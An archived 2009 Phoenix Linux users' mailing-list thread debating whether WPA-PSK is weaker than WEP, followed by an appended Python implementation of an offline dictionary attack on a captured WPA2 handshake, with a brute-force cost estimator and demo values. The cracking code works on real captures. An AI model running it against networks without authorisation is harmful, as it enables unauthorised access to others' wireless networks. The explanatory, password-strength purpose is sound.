Lisa,
I'll grant you the denial-of-service attack, but I'm still not finding
any evidence that WPA is fundamentally flawed (much less "easier to
crack... than WEP").
I read the aircrack article earlier to see if there was new info that I
had missed. I also read the article you have on obnosis.com. Finally,
I read the LucidInteractive article you just provided.
ALL of them say the same thing: the only valid attack on WPA-PSK is a
dictionary or brute force attack!
Okay, yes, it's very handy that you can do the password cracking
offline. But see the links I listed earlier... any decently crafted
password will be nigh IMPOSSIBLE to crack unless you have nearly
infinite resources -- offline or no.
I realize that you likely (for sure) know more about this than I do so
if I keep missing some fundamental flaw in PSK in all of the articles
provided, please enlighten me!
Kurt
On 11/14/09 5:59 PM, Lisa Kachold wrote:
> Kurt,
>
> As you stated, WPA/WPA2-PSK security is inherently flawed:
>
> * One flaw allowed an attacker to cause a denial-of-service attack,
> if the attacker could bypass several other layers of protection.
> * A second flaw exists in the method with which WPA initializes its
> encryption scheme. Consequently, it's actually easier to crack WPA
> than it is to crack WEP. This flaw is the subject of this article.
>
>
> A WPA key /can/ be made good enough to make cracking it unfeasible. WPA
> is also a little more cracker friendly. By capturing the right type of
> packets, you can do your cracking offline. This means you only have to
> be near the AP for a matter of seconds to get what you need. WPA
> basically comes in two flavours RADIUS or PSK. PSK is crackable, RADIUS
> is not so much.
>
> *But how many people actually have WPA RADIUS encryption?*
>
> Here's another link that includes PSK cracking Howto:
> http://www.aircrack-ng.org/doku.php?id=cracking_wpa
>
> Using aircrack-ng tools in BackTrack (per my presentation materials at
> http://plug.phoenix.az.us show) WEP and WPA/WPA2-PSK are easy to crack.
>
> Does anyone here run Radius?
>
> Here's an accompanying document to better explain it:
> http://docs.lucidinteractive.ca/index.php/Cracking_WEP_and_WPA_Wireless_Networks
>
>
> On Sat, Nov 14, 2009 at 7:32 PM, Kurt Granroth
> <kurt+plug-discuss@granroth.com> wrote:
>
> On 11/14/09 12:02 PM, Lisa Kachold wrote:
> > The whole concept of "wireless encryption security" is somewhat moot
> > with airodump-ng etc. tools.
> >
> > WEP keys are really easy to break.
> >
> > WPA is also easily encroached - but harder with a truly unique secure
> > key (which few people use)
> >
> > It just exists as part of the big "security" matrix to keep the honest
> > people out. Crackers can get right in anyway!
> >
> > http://www.obnosis.com/Layer8Wireless.html
>
> Okay, I have to take exception to how this is written. You are
> comparing the security of WEP and WPA as if they are somehow equivalent
> or equally "easy" to crack. That is just not true.
>
> WEP is fundamentally broken. It can be reliably cracked in seconds, in
> most cases. Its use is more of a "please don't use this network" flag
> than any real attempt to keep people out.
>
> WPA, on the other hand, is NOT broken. Only one variation of it is
> crackable at all (PSK) and even then, the attack is a brute force
> dictionary attack. By that argument, ALL password based encryption is
> crackable.
>
> Yes, you could successfully argue that since MOST home APs use PSK and
> MOST probably just set the password to 'admin' or 'linksys' or some
> other trivial name, that IN PRACTICE, it's not hard to crack most uses
> of WPA.
>
> But saying that "[c]rackers can get right in anyway" just isn't true.
> All that is needed is a reasonably difficult password. Don't use a
> dictionary word and make it decently long and it quickly becomes far too
> difficult to crack to make it worth it for all but the most extreme
> cases. It's either VERY expensive or takes YEARS.
>
> I'm sure that you read this:
>
> http://news.electricalchemy.net/2009/10/password-cracking-in-cloud-part-5.html
>
> It answers the question: "how much does it cost to crack a password?"
> It assumes that you are using Amazon EC2 at $0.30 an hour. A twelve
> character password using the full ASCII set would cost over $8 TRILLION
> dollars to crack. Even much smaller passwords are still in the
> millions.
>
> The password that I use on my WPA2-PSK AP is 20-odd chars long and spans
> the ASCII range. Far from allowing crackers to "get right in", it's
> nearly impossible for them to do so.
> ---------------------------------------------------
> PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
> To subscribe, unsubscribe, or to change your mail settings:
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>
>
>
>
> --
> Skype: (623)239-3392
> AT&T: (503)754-4452
> www.it-clowns.com
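The offline attack both sides of this thread are describing, written out as an added example so the cost argument can be checked rather than argued about. This is not code from the thread or from aircrack-ng; it implements the same arithmetic that tool applies to a captured four-way handshake: PSK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds), PTK = PRF-512(PSK, "Pairwise key expansion", MACs and nonces), and the EAPOL-Key MIC = HMAC-SHA1(KCK, frame with the MIC field zeroed) truncated to 16 bytes. Because every input to that chain except the passphrase is sent in the clear, an attacker who has the handshake needs no further contact with the AP, which is the "matter of seconds near the AP" point. The MAC addresses, nonces, EAPOL frame and wordlist below are constructed for the demo, not taken from a real capture; the only real value is the IEEE 802.11 Annex H test vector ("password" on SSID "IEEE"). The guess rate passed to `worst_case_hours` is an assumption you must measure on your own hardware.

```python
"""WPA2-PSK offline dictionary attack, reduced to its core arithmetic.

The handshake values below are constructed for illustration, not captured.
"""
import hashlib
import hmac
import struct
from typing import Iterable, Optional

# Constructed handshake parameters (a real attack reads these from the capture).
AP_MAC = bytes.fromhex("a0a1a1a3a4a5")
STA_MAC = bytes.fromhex("b0b1b2b3b4b5")
ANONCE = bytes(range(0xE0, 0xE0 + 32))
SNONCE = bytes(range(0xC0, 0xC0 + 32))


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PSK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 256 bits).

    The 4096 rounds are the only thing that slows a guess; the "salt" is the
    public SSID, so rainbow tables per common SSID are feasible.
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Pairwise Transient Key from the PMK plus the four public handshake values."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): HMAC-SHA1 truncated to 16 bytes."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes) -> bytes:
    """Constructed EAPOL-Key message 2; the MIC field (bytes 81..96) is zeroed."""
    body = (
        b"\x02"                   # descriptor type: RSN
        + b"\x01\x0a"             # key info: version 2, pairwise, MIC present
        + b"\x00\x10"             # key length
        + (1).to_bytes(8, "big")  # replay counter
        + snonce                  # key nonce
        + b"\x00" * 16            # key IV
        + b"\x00" * 8             # key RSC
        + b"\x00" * 8             # key ID
        + b"\x00" * 16            # MIC field, zero while the MIC is computed
        + b"\x00\x00"             # key data length
    )
    return b"\x02\x03" + struct.pack(">H", len(body)) + body  # EAPOL v2, type Key


def make_demo_capture(passphrase: str, ssid: str) -> dict:
    """Simulate what airodump-ng records: public values plus the MIC that the
    legitimate station computed from the real passphrase."""
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    frame = build_msg2(SNONCE)
    return {"ssid": ssid, "aa": AP_MAC, "spa": STA_MAC, "anonce": ANONCE,
            "snonce": SNONCE, "eapol": frame, "mic": eapol_mic(kck, frame)}


def crack(capture: dict, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: one PBKDF2, one PRF and one HMAC per guess."""
    for guess in wordlist:
        pmk = pmk_from_passphrase(guess, capture["ssid"])
        kck = derive_ptk(pmk, capture["aa"], capture["spa"],
                         capture["anonce"], capture["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, capture["eapol"]), capture["mic"]):
            return guess
    return None


def worst_case_hours(charset_size: int, length: int, guesses_per_second: float) -> float:
    """Hours to exhaust charset_size**length guesses at an assumed guess rate."""
    return charset_size ** length / guesses_per_second / 3600


if __name__ == "__main__":
    cap = make_demo_capture("password", "IEEE")
    print("recovered:", crack(cap, ["linksys", "admin", "password"]))
    # Assumed rate of 1e6 guesses/s (hypothetical; measure yours with aircrack-ng -S).
    print("8 lowercase chars, hours:", worst_case_hours(26, 8, 1e6))
    print("12 printable-ASCII chars, hours:", worst_case_hours(95, 12, 1e6))
```

Two things to read off the numbers rather than the prose: the per-guess cost is fixed by the protocol (4096 HMAC-SHA1 rounds plus a handful more), so the only defender-controlled variable is the size of the space the wordlist has to cover, and a 20-plus character passphrase drawn from the full printable range pushes `worst_case_hours` into a region no guess rate makes practical. Conversely, the same code against a wordlist of router defaults finishes in well under a second, which is the case both correspondents agree on.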